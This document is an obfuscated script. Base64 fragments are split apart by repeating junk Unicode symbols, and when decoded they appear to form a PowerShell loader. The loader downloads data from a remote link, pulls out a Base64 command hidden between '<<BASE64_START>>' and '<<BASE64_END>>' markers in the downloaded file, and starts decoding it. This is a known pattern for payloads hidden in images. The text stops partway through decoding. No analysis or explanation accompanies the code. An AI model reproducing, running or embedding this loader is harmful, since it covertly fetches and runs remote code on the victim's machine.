⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bgB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB3⤏ ꒼ ⛲ ⫰ 〷C0⤏ ꒼ ⛲ ⫰ 〷TwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷VwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgB5⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷ew⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷dwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBE⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dwBu⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷R⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQ⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷aw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷fQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BX⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷aQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LQBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷JwBG⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bwB3⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bm⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷ZwBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBu⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷ZQBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷UwB5⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷LgBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷RQBu⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷bwBk⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷Og⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷FU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Dg⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cgB0⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷8⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷QgBB⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷RQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷XwBT⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷QQBS⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷+⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷RgBs⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷P⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷UwBF⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷Bf⤏ ꒼ ⛲ ⫰ 〷EU⤏ ꒼ ⛲ ⫰ 〷TgBE⤏ ꒼ ⛲ ⫰ 〷D4⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷BP⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷aQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷ZwBl⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷TwBm⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Zg⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷w⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷r⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷dQBi⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷By⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷Ew⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷WwBT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷ZQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷XQ⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷RgBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBC⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ 